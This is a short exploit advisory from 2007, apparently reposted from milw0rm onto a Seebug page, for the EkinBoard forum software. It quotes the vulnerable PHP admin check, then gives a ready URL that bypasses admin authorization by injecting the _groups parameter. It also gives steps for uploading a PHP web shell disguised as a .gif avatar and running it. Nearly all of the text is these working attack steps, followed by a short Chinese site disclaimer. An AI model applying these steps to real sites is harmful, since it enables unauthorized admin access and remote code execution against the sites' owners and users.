----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ] EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . We can bypass admin authorization if register_globals on . All admin panel script include this code <?php if(!in_array(2, $_groups)){ die("<center><span class=red>You need to be an admin to access this page!</span></center>"); } ?> test1.ru/skvoznoy/backup.php?_groups[]=2 There is a bug in upload function . We can upload any file bypass filters . Name your shell like file.php.gif and select it as your avatar . Then check uploaded/avatars/filename_your_id.php ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] # milw0rm.com [2008-01-07]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论